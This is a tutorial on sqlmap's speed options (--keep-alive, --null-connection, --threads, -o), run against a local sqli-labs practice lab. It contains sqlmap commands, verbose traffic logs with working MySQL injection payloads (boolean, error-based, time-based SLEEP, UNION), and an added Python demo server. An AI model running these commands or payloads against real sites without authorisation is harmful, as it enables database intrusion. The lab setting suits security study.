Python Full Stack (5) Web Security Attack and Defense, Part 4: sqlmap Performance Optimization and Injection Technique Parameters

I. sqlmap performance optimization

1. Setting a persistent HTTP connection in sqlmap

sqlmap can be told to use a persistent connection, which puts Connection: keep-alive in the HTTP request headers.
A long-lived connection avoids the cost of setting up a new TCP connection for every request, but it ties up a server slot for as long as it stays open.

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --keep-alive --banner -v 5

Output:

        ___                                                                                                                                               
       __H__                                                                                                                                              
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}                                                                                                                  
|_ -| . [)]     | .'| . |                                                                                                                                 
|___|_  [(]_|_|_|__,|  _|                                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                                               
                                                                                                                                                          
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                          
[*] starting @ 17:06:39 /2020-02-29/                                                                                                                      
                                                                                                                                                          
[17:06:39] [DEBUG] cleaning up configuration parameters                                                                                                   
[17:06:40] [DEBUG] setting the HTTP timeout                                                                                                               
[17:06:40] [DEBUG] setting the HTTP User-Agent header                                                                                                     
[17:06:40] [DEBUG] creating HTTP requests opener object                                                                                                   
[17:06:40] [INFO] resuming back-end DBMS 'mysql'                                                                                                          
[17:06:40] [INFO] testing connection to the target URL                                                                                                    
[17:06:40] [TRAFFIC OUT] HTTP request [#1]:                                                                                                               
GET /sqli-labs/Less-1/?id=1 HTTP/1.1                                                                                                                      
Cache-control: no-cache                                                                                                                                   
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)                                                                                                       
Host: 127.0.0.1                                                                                                                                           
Accept: */*                                                                                                                                               
Accept-encoding: gzip,deflate                                                                                                                             
Connection: keep-alive                                                                                                                                    
                                                                                                                                                          
[17:06:40] [DEBUG] declared web page charset 'utf-8'                                                                                                      
[17:06:40] [TRAFFIC IN] HTTP response [#1] (200 OK):                                                                                                      
Date: Sat, 29 Feb 2020 09:06:40 GMT                                                                                                                       
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a                                                                                             
X-Powered-By: PHP/7.3.4                                                                                                                                   
Keep-Alive: timeout=5, max=100                                                                                                                            
Connection: Keep-Alive                                                                                                                                    
Transfer-Encoding: chunked                                                                                                                                
Content-Type: text/html; charset=UTF-8                                                                                                                    
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1                                                                                                           
sqlmap resumed the following injection point(s) from stored session:                                                                                      
---                                                                                                                                                       
Parameter: id (GET)                                                                                                                                       
    Type: boolean-based blind                                                                                                                             
    Title: AND boolean-based blind - WHERE or HAVING clause                                                                                               
    Payload: id=1' AND 6613=6613 AND 'wyLD'='wyLD                                                                                                         
    Vector: AND [INFERENCE]                                                                                                                               
                                                                                                                                                          
    Type: error-based                                                                                                                                     
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)                                                              
    Payload: id=1' AND (SELECT 4185 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(4185=4185,1))),0x71706a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aqQg'='aqQg
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
                                                                                                                                                          
    Type: time-based blind                                                                                                                                
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                             
    Payload: id=1' AND (SELECT 4770 FROM (SELECT(SLEEP(5)))RbSZ) AND 'xahz'='xahz                                                                         
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])                                             
                                                                                                                                                          
    Type: UNION query                                                                                                                                     
    Title: Generic UNION query (NULL) - 3 columns                                                                                                         
    Payload: id=-9218' UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x4e6a506169494f6c654a42614659426f70457a4f77454d4f494c415144525967626d41745067674a,0x71706a7871)-- -
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- -                                                                                                       
---                                                                                                                                                       
[17:06:40] [INFO] the back-end DBMS is MySQL                                                                                                              
[17:06:40] [INFO] fetching banner                                                                                                                         
[17:06:40] [DEBUG] resuming configuration option 'string' ('Your')                                                                                        
[17:06:40] [DEBUG] performed 0 queries in 0.00 seconds                                                                                                    
back-end DBMS: MySQL >= 5.0                                                                                                                               
banner: '5.7.26'                                                                                                                                          
[17:06:40] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'                                         
                                                                                                                                                          
[*] ending @ 17:06:40 /2020-02-29/                                                                                                                        

Sure enough, the response carries Keep-Alive: timeout=5, max=100; without --keep-alive it would show Connection: close instead.
A proxy cannot be combined with a persistent connection, otherwise the two settings conflict, for example:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --keep-alive --banner --proxy "http://218.18.158.216:8000" -v 5

Output:

        ___                                                                                                                                               
       __H__                                                                                                                                              
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}                                                                                                                  
|_ -| . [(]     | .'| . |                                                                                                                                 
|___|_  [,]_|_|_|__,|  _|                                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                                               
                                                                                                                                                          
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                          
[*] starting @ 17:20:32 /2020-02-29/                                                                                                                      
                                                                                                                                                          
[17:20:32] [DEBUG] cleaning up configuration parameters                                                                                                   
[17:20:32] [DEBUG] setting the HTTP timeout                                                                                                               
[17:20:32] [DEBUG] setting the HTTP User-Agent header                                                                                                     
[17:20:32] [DEBUG] setting the HTTP/SOCKS proxy for all HTTP requests                                                                                     
[17:20:32] [DEBUG] creating HTTP requests opener object                                                                                                   
[17:20:32] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of its incompatibility with HTTP(s) proxy                      
[17:20:33] [INFO] resuming back-end DBMS 'mysql'                                                                                                          
[17:20:33] [INFO] testing connection to the target URL                                                                                                    
[17:20:33] [TRAFFIC OUT] HTTP request [#1]:                                                                                                               
GET /sqli-labs/Less-1/?id=1 HTTP/1.1                                                                                                                      
Cache-control: no-cache                                                                                                                                   
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)                                                                                                       
Host: 127.0.0.1                                                                                                                                           
Accept: */*                                                                                                                                               
Accept-encoding: gzip,deflate                                                                                                                             
Connection: keep-alive                                                                                                                                    
                                                                                                                                                          
[17:20:34] [DEBUG] declared web page charset 'utf-8'                                                                                                      
[17:20:34] [TRAFFIC IN] HTTP response [#1] (404 Not Found):                                                                                               
Date: Sat, 29 Feb 2020 09:20:33 GMT                                                                                                                       
Content-Type: text/html; charset=utf-8                                                                                                                    
Vary: Accept-Encoding                                                                                                                                     
X-Cache: MISS from KX-S42-Web-85                                                                                                                          
X-Cache-Lookup: MISS from KX-S42-Web-85:3128                                                                                                              
Via: 1.0 KX-S42-Web-85 (squid/3.1.23)                                                                                                                     
Connection: close                                                                                                                                         
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1                                                                                                           
[17:20:34] [CRITICAL] page not found (404)                                                                                                                
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]                      
                                                                                                                                                          
[17:20:38] [WARNING] HTTP error codes detected during run:                                                                                                
404 (Not Found) - 1 times                                                                                                                                 
                                                                                                                                                          
[*] ending @ 17:20:38 /2020-02-29/                                                                                                                        
                                                                                                                                                          

The request still carries Connection: keep-alive, but once a proxy is configured the connection is closed anyway even though a persistent connection was asked for; in other words, --keep-alive has no effect in this case (sqlmap says so itself in the WARNING line: Keep-Alive is disabled because it is incompatible with an HTTP(s) proxy). Note also that the 404 in this run is returned through the proxy (see the Via: ... squid header), not by the local sqli-labs server: from the proxy's side, 127.0.0.1 is the proxy host, not the tester's machine.

2. Telling sqlmap not to receive the HTTP body

Parameter:
--null-connection
Sets a NULL connection in sqlmap, meaning the body of the HTTP response is not received;
the size of the HTTP response can be obtained directly without fetching the response body.
It is typically used in blind injection, where only the response size matters, so skipping the HTTP body cuts network bandwidth use. (The -v 5 trace below shows how sqlmap checks whether the target supports this: a HEAD request, then a GET with Range: bytes=-1.)
Testing in Kali:

sqlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --null-connection --banner -v 5

Output:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.8#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:43:01 /2020-02-29/

[17:43:01] [DEBUG] cleaning up configuration parameters
[17:43:01] [DEBUG] setting the HTTP timeout
[17:43:01] [DEBUG] setting the HTTP User-Agent header
[17:43:01] [DEBUG] creating HTTP requests opener object
[17:43:01] [INFO] resuming back-end DBMS 'mysql' 
[17:43:01] [INFO] testing connection to the target URL
[17:43:01] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: gzip,deflate
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close

[17:43:01] [DEBUG] declared web page charset 'utf-8'
[17:43:01] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 09:43:00 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [INFO] testing NULL connection to the target URL
[17:43:01] [TRAFFIC OUT] HTTP request [#2]:
HEAD /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: identity
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close

[17:43:01] [TRAFFIC IN] HTTP response [#2] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [TRAFFIC OUT] HTTP request [#3]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Accept-encoding: identity
Cache-control: no-cache
Range: bytes=-1
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close

[17:43:01] [TRAFFIC IN] HTTP response [#3] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [TRAFFIC OUT] HTTP request [#4]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: identity
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close

[17:43:01] [TRAFFIC IN] HTTP response [#4] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5740=5740 AND 'mIdv'='mIdv
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x71767a7a71,(SELECT (ELT(1690=1690,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cbli'='Cbli
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2810 FROM (SELECT(SLEEP(5)))iZjP) AND 'aeqh'='aeqh
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9925' UNION ALL SELECT NULL,CONCAT(0x71767a7a71,0x4f6c754f767965706a664f514845696874654a594457514e564e4a53734a75776a73535653785375,0x716b6b7871),NULL-- NsvS
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]
---
[17:43:01] [INFO] the back-end DBMS is MySQL
[17:43:01] [INFO] fetching banner
[17:43:01] [DEBUG] resuming configuration option 'string' ('Your')
[17:43:01] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:43:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:43:01] [WARNING] you haven't updated sqlmap for more than 210 days!!!

[*] ending @ 17:43:01 /2020-02-29/
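
To make the two options above concrete, here is an added example (it is not code from the original post and not sqlmap's own code). A throwaway HTTP/1.1 server written here stands in for the sqli-labs host (everything about it is constructed: the page body, the counters, the Keep-Alive header it echoes back), and two probes against it show what --keep-alive and --null-connection change on the wire: three GETs on a persistent connection cost one TCP connection instead of three, and the page size can be learned with a HEAD request or a 1-byte Range request, the same two probes that appear in the -v 5 trace, without downloading the body at all. Only the request path is taken from the post.

```python
# Added example (not from the original post, not sqlmap's own code): a throwaway HTTP/1.1
# server stands in for the sqli-labs host and two probes show what --keep-alive and
# --null-connection change on the wire. Server, page body and counters are all constructed.
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

PATH = "/sqli-labs/Less-1/?id=1"   # path from the post; the host behind it is fake
PAGE = b"<html><body>Your Login name:Dumb Your Password:Dumb</body></html>" * 50  # constructed
_lock = threading.Lock()
_stats = {"connections": 0, "requests": 0, "body_bytes": 0}   # what the server observed

class LabHandler(BaseHTTPRequestHandler):
    """Mimics the Apache box in the post: honours keep-alive, HEAD and Range: bytes=-1."""
    protocol_version = "HTTP/1.1"   # HTTP/1.0 would close after every request
    timeout = 2                     # drop idle keep-alive sockets after 2 s

    def handle(self):               # runs once per TCP connection
        with _lock:
            _stats["connections"] += 1
        super().handle()

    def log_message(self, *args):   # keep the demo quiet
        pass

    def _respond(self, send_body):
        with _lock:
            _stats["requests"] += 1
        body, status = PAGE, 200
        rng = self.headers.get("Range", "")
        if rng.startswith("bytes=-"):                     # suffix range such as bytes=-1
            n = int(rng[len("bytes=-"):])
            body, status = PAGE[-n:], 206
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))   # needed for keep-alive to work
        if status == 206:
            self.send_header("Content-Range", "bytes %d-%d/%d" % (len(PAGE) - n, len(PAGE) - 1, len(PAGE)))
        if self.close_connection:                          # client sent Connection: close
            self.send_header("Connection", "close")
        else:                                              # the headers Apache returned in the post
            self.send_header("Keep-Alive", "timeout=5, max=100")
            self.send_header("Connection", "Keep-Alive")
        self.end_headers()
        if send_body:
            with _lock:
                _stats["body_bytes"] += len(body)
            self.wfile.write(body)

    def do_GET(self):
        self._respond(send_body=True)

    def do_HEAD(self):
        self._respond(send_body=False)   # headers only; Content-Length still states the full size

def _snap():
    with _lock:
        return dict(_stats)

def connection_demo(port, keep_alive, n=3):
    """--keep-alive vs. Connection: close; returns (TCP connections seen, requests, last Connection header)."""
    before = _snap()
    conn = http.client.HTTPConnection("127.0.0.1", port)
    hdr = {"Connection": "keep-alive" if keep_alive else "close"}
    for _ in range(n):
        conn.request("GET", PATH, headers=hdr)   # http.client reconnects on its own after a close
        resp = conn.getresponse()
        resp.read()
        last = resp.getheader("Connection")
    conn.close()
    after = _snap()
    return after["connections"] - before["connections"], after["requests"] - before["requests"], last

def page_size_via(port, method):
    """--null-connection: page size by HEAD or a 1-byte Range instead of a full GET; returns (size, body bytes sent)."""
    before = _snap()["body_bytes"]
    verb, hdr = {"GET": ("GET", {}), "HEAD": ("HEAD", {}), "RANGE": ("GET", {"Range": "bytes=-1"})}[method]
    conn = http.client.HTTPConnection("127.0.0.1", port)
    conn.request(verb, PATH, headers=hdr)
    resp = conn.getresponse()
    resp.read()
    conn.close()
    if method == "RANGE":
        size = int(resp.getheader("Content-Range").rsplit("/", 1)[1])   # total length after '/'
    else:
        size = int(resp.getheader("Content-Length"))   # for HEAD: the body it did not send
    return size, _snap()["body_bytes"] - before

def run_demo():
    """Start the fake host on an ephemeral port, run every probe, shut it down again."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), LabHandler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return {"keep_alive": connection_demo(port, True), "close": connection_demo(port, False),
                "GET": page_size_via(port, "GET"), "HEAD": page_size_via(port, "HEAD"),
                "RANGE": page_size_via(port, "RANGE")}
    finally:
        server.shutdown()
        server.server_close()
```

Calling run_demo() (Python 3.7 or newer, no network needed) returns a dict in which keep_alive is (1, 3, 'Keep-Alive') and close is (3, 3, 'close'): the same three requests, one TCP connection versus three. GET returns (len(PAGE), len(PAGE)), HEAD returns (len(PAGE), 0) and RANGE returns (len(PAGE), 1): all three learn the same page size, but the two null-connection probes make the server send at most one body byte, which is exactly the saving --null-connection buys during blind injection, where only the response size is compared. The Keep-Alive: timeout=5, max=100 header is also the thing to read when judging whether a persistent connection was really granted: a server that answers Connection: close, as the proxied run above did, silently falls back to one connection per request.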


3. Setting multiple threads in sqlmap

Parameter:
--threads (the documented spelling; the commands below use the shortened --thread, which sqlmap accepts as an unambiguous abbreviation)
Sets how many HTTP requests sqlmap sends concurrently.
Testing in Kali:

sqlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --thread 10 --banner -v 5

Output:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.8#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:46:39 /2020-02-29/

[17:46:39] [DEBUG] cleaning up configuration parameters
[17:46:39] [DEBUG] setting the HTTP timeout
[17:46:39] [DEBUG] setting the HTTP User-Agent header
[17:46:39] [DEBUG] creating HTTP requests opener object
[17:46:40] [INFO] resuming back-end DBMS 'mysql' 
[17:46:40] [INFO] testing connection to the target URL
[17:46:40] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: gzip,deflate
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close

[17:46:40] [DEBUG] declared web page charset 'utf-8'
[17:46:40] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 09:46:39 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5740=5740 AND 'mIdv'='mIdv
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x71767a7a71,(SELECT (ELT(1690=1690,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cbli'='Cbli
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2810 FROM (SELECT(SLEEP(5)))iZjP) AND 'aeqh'='aeqh
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9925' UNION ALL SELECT NULL,CONCAT(0x71767a7a71,0x4f6c754f767965706a664f514845696874654a594457514e564e4a53734a75776a73535653785375,0x716b6b7871),NULL-- NsvS
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]
---
[17:46:40] [INFO] the back-end DBMS is MySQL
[17:46:40] [INFO] fetching banner
[17:46:40] [DEBUG] resuming configuration option 'string' ('Your')
[17:46:40] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:46:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:46:40] [WARNING] you haven't updated sqlmap for more than 210 days!!!

[*] ending @ 17:46:40 /2020-02-29/


The scan finished almost instantly, probably because the earlier results were cached in the session files under /root/.sqlmap/output/192.168.0.103; delete that directory and test again.

sqlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --thread 10 --banner

Output:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.8#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:52:01 /2020-02-29/

[17:52:01] [INFO] testing connection to the target URL
[17:52:01] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:52:01] [INFO] testing if the target URL content is stable
[17:52:02] [INFO] target URL content is stable
[17:52:02] [INFO] testing if GET parameter 'id' is dynamic
[17:52:02] [INFO] GET parameter 'id' appears to be dynamic
[17:52:02] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[17:52:02] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[17:52:02] [INFO] testing for SQL injection on GET parameter 'id'
[17:52:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'ing provided level (1) and risk (1) values? [Y/n] 
[17:52:05] [WARNING] reflective value(s) found and filtering out
[17:52:05] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[17:52:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:52:05] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:52:05] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:52:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:52:05] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[17:52:05] [INFO] testing 'MySQL inline queries'
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[17:52:05] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)                            
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[17:52:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[17:52:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:52:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:52:15] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[17:52:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:52:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:52:15] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:52:15] [INFO] target URL appears to have 3 columns in query
[17:52:15] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5685=5685 AND 'zDwo'='zDwo

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 3544 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(3544=3544,1))),0x7176787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HmJC'='HmJC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2801 FROM (SELECT(SLEEP(5)))aNGQ) AND 'JWiB'='JWiB

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-7025' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x6355614c635050625177414166564173496f6c6558686978795257636b647a4b465a634b4a724275,0x7176787671),NULL-- ImLs
---
[17:52:17] [INFO] the back-end DBMS is MySQL
[17:52:17] [INFO] fetching banner
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:52:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:52:17] [WARNING] you haven't updated sqlmap for more than 210 days!!!

[*] ending @ 17:52:17 /2020-02-29/


4. One-switch optimization

Parameter:

-o
Adding this switch is equivalent to adding the following three optimization parameters at the same time:

  • --keep-alive
  • --null-connection
  • --threads=3

Run the test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -o --banner

Output

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:10:58 /2020-02-29/

[18:10:59] [INFO] testing connection to the target URL
[18:10:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:10:59] [INFO] testing NULL connection to the target URL
[18:10:59] [INFO] testing if the target URL content is stable
[18:10:59] [INFO] target URL content is stable
[18:10:59] [INFO] testing if GET parameter 'id' is dynamic
[18:10:59] [INFO] GET parameter 'id' appears to be dynamic
[18:10:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[18:10:59] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[18:10:59] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

